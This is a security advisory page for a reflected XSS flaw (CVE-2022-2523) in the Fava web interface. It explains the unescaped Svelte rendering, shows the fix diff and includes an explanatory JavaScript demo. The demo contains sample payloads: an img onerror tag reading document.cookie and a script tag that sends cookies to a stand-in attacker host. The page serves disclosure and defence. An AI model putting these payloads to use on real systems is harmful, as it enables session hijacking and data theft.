Cross-site Scripting (XSS) - Reflected in beancount/fava
Description
Cross-site Scripting (XSS) - Reflected in GitHub repository beancount/fava prior to 1.22.2.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Reflected XSS in Fava prior to 1.22.2 allows attackers to inject arbitrary JavaScript via crafted query filter parameters.
Vulnerability
Description
CVE-2022-2523 is a reflected cross-site scripting (XSS) vulnerability in the beancount/fava web interface, affecting versions prior to 1.22.2. The root cause is that user-influenced strings reached the page through Svelte's {@html ...} directive, which inserts its argument as raw markup and bypasses the escaping that ordinary {...} text interpolation applies. Two places rendered this way: the query error message in Query.svelte and the per-account inventory rows in the entry context modal, so HTML or JavaScript carried in a crafted query filter was inserted into the DOM unescaped [1][2].
Exploitation
The vulnerability is exploitable over the network with low attack complexity and without privileges, but it requires user interaction: the attacker crafts a URL to a Fava instance whose query filter carries HTML or JavaScript, and the payload runs only when a victim who can reach that instance opens the link. The script then executes in the origin of the Fava application, with whatever access the victim has there, which can mean ledger data theft, session hijacking, or actions performed as the victim [1].
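The two render paths side by side in plain JavaScript, as an added example that is not Fava's code: it models what Svelte's {@html ...} and {...} do with the same inventory and error strings, using a small escapeHtml stand-in for Svelte's text escaping and constructed sample values (the hostile amount and the error message are made up for the example, not taken from the advisory).

```javascript
// Added example (not Fava's code): models the two Svelte render paths the
// patch switches between. `{@html x}` inserts x as raw markup, like
// element.innerHTML = x; `{x}` creates a text node, so markup in x is inert.
// Every input string below is constructed for the example.

// Minimal stand-in for Svelte's text-interpolation escaping: the characters
// that can open a tag or break out of an attribute become entities.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable shape (pre-1.22.2): {@html inventory.join("<br>")}.
// Whatever an amount string contains lands in the DOM as markup.
function renderInventoryRaw(inventory) {
  return inventory.join("<br>");
}

// Patched shape: {#each inventory as amount}{amount}<br />{/each}.
// Each amount is interpolated as text, so it is escaped before insertion
// (note the trailing <br /> after the last item, as in the patch).
function renderInventoryEscaped(inventory) {
  return inventory.map((amount) => `${escapeHtml(amount)}<br />`).join("");
}

// Vulnerable shape in Query.svelte: {@html error}
function renderErrorRaw(error) {
  return error;
}

// Patched shape: {error}
function renderErrorEscaped(error) {
  return escapeHtml(error);
}

// Cheap check on rendered output: the only tags the template itself emits
// are the line breaks, so any other tag came from the data.
const TEMPLATE_TAGS = new Set(["<br />", "<br>"]);
function containsForeignMarkup(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.some((t) => !TEMPLATE_TAGS.has(t));
}

// Constructed inputs: benign amounts, an amount carrying an event-handler
// tag, and a query error that echoes script-bearing input.
const BENIGN = ["10.00 USD", "-2.50 EUR"];
const HOSTILE = ["10.00 USD", '<img src=x onerror="alert(document.cookie)">'];
const HOSTILE_ERROR =
  'syntax error near <script>fetch("//attacker.example/?c="+document.cookie)</script>';

// Runs each input through both paths and reports whether foreign markup
// survived; the raw paths let it through, the escaped paths neutralise it.
function demo() {
  return {
    rawBenignSafe: !containsForeignMarkup(renderInventoryRaw(BENIGN)),
    rawHostileUnsafe: containsForeignMarkup(renderInventoryRaw(HOSTILE)),
    escapedHostileSafe: !containsForeignMarkup(renderInventoryEscaped(HOSTILE)),
    errorRawUnsafe: containsForeignMarkup(renderErrorRaw(HOSTILE_ERROR)),
    errorEscapedSafe: !containsForeignMarkup(renderErrorEscaped(HOSTILE_ERROR)),
  };
}

console.log(demo());
```

The check in containsForeignMarkup is deliberately narrow: it only tells you whether a tag other than the template's own line break reached the output, which is exactly the invariant the patch restores. It is a test aid, not a sanitizer; the fix is to stop using {@html} on data, not to filter it.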
Impact
Successful exploitation lets an attacker execute arbitrary JavaScript in the victim's browser within the Fava origin, compromising the confidentiality and integrity of the ledger data and session the victim can access. The CVSS v3.1 base score reported by the advisory is 8.1 (High) [1].
Mitigation
The issue was fixed in commit dccfb6a2f4567f35ce2e9a78e24f92ebf946bc9b, which replaces the {@html ...} renderings of the query error and the inventory rows with escaped text interpolation; the fix ships in version 1.22.2. Upgrade to 1.22.2 or later [3][4]. No workarounds are specified.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| fava (PyPI) | < 1.22.2 | 1.22.2 |
Affected products
- beancount / beancount/fava (version range: unspecified)
Patches
dccfb6a2f456: fix xss issue in query filter
2 files changed · +9 −3
frontend/src/modals/EntryContext.svelte+8 −2 modified@@ -35,7 +35,10 @@ <tr> <td><a href={urlForAccount(account)}>{account}</a></td> <td> - {@html inventory.join("<br>")} + {#each inventory as amount} + {amount} + <br /> + {/each} </td> </tr> {/each} @@ -52,7 +55,10 @@ <tr> <td><a href={urlForAccount(account)}>{account}</a></td> <td> - {@html inventory.join("<br>")} + {#each inventory as amount} + {amount} + <br /> + {/each} </td> </tr> {/each}
frontend/src/query/Query.svelte+1 −1 modified@@ -106,7 +106,7 @@ {/if} {@html result.table} {:else if error} - {@html error} + {error} {/if} </div> </details>
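Review bot: in both EntryContext.svelte hunks the new `{#each}` loop emits a `<br />` after every amount, including the last one, whereas the replaced `inventory.join("<br>")` only placed a break between items, so every inventory cell now ends with a stray line break; either render the separator conditionally (`{#each inventory as amount, i}` with `{#if i < inventory.length - 1}<br />{/if}`) or drop the `<br />` and stack the amounts with a block element styled in CSS. The two hunks are also byte-for-byte identical, which argues for a small shared component for that cell so the next change here is made once.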
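Review bot: the Query.svelte hunk fixes `{@html error}` but leaves `{@html result.table}` two lines above it, so the component still injects server-produced markup unescaped; the commit should state, in a comment at that line, where the cells of `result.table` are escaped on the server, because any user-controlled value that reaches that HTML without escaping reopens exactly the issue this patch closes. If that guarantee cannot be named, the table should be built from structured data in the template rather than from a pre-rendered HTML string.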
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/advisories/GHSA-q8hg-3vqv-f8v3 (GHSA advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2022-2523 (NVD entry)
[3] github.com/beancount/fava/commit/dccfb6a2f4567f35ce2e9a78e24f92ebf946bc9b (fix commit)
[4] github.com/pypa/advisory-database/tree/main/vulns/fava/PYSEC-2022-240.yaml (PyPI advisory database)
[5] huntr.dev/bounties/2a1802d8-1c2e-4919-96a7-d4dcf7ffcf8f (huntr bounty report)